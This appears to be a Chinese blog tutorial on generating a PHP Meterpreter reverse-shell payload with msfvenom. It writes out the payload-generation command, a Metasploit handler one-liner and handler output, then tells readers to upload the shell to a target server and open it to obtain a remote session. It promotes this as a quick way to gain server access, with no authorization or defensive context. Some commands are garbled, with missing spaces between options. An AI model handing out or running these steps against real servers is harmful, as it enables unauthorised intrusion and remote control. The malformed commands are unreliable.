今天我們將會討論一個非常有用的工具——msfvenom php shell。這個工具可以幫助我們快速生成 PHP shell,在獲取服務(wù)器訪問權(quán)限時非常有幫助。這個工具的使用就像創(chuàng)建普通的 Metasploit payload,但添加進來了一些其他的選項。下面我們就來看看如何使用 msfvenom php shell 的示例。
msfvenom -p php/meterpreter/reverse_tcp LHOST=attackerIPLPORT=attackerPort-f raw -o shell.php
以上命令將會創(chuàng)建一個能夠與本機的 Metasploit 相連的 php shell。我將使用 192.168.1.2 作為攻擊者的 IP,端口設(shè)為 1234。
msfconsole -x "use exploit/multi/handler; set payload php/meterpreter/reverse_tcp; set LHOSTattackerIP; set LPORTattackerPort; run"
使用以上的命令來啟動 metasploit,如果一切都設(shè)置好了的話,你應(yīng)該會看到如下的結(jié)果。
[*] Started reverse handler on 192.168.1.2:1234 [*] Starting the payload handler...
現(xiàn)在我們可以通過上傳生成的 PHP shell 文件到目標(biāo)服務(wù)器并在瀏覽器上訪問它來連接攻擊者的 Metasploit 會話。
http://localhost/shell.php
一旦你訪問了上傳的 PHP shell,你將有著 Metasploit 會話下的 Web Shell 權(quán)限,你也可以通過 Metasploit handler 向該目標(biāo)發(fā)送命令。
以上就是關(guān)于 msfvenom php shell 的全部內(nèi)容。這個工具非常方便、實用,并且還能夠快速讓您獲取服務(wù)器訪問權(quán)限。如果你還沒有嘗試過這個工具,強烈建議你趕緊學(xué)習(xí)并上手。
下一篇aphp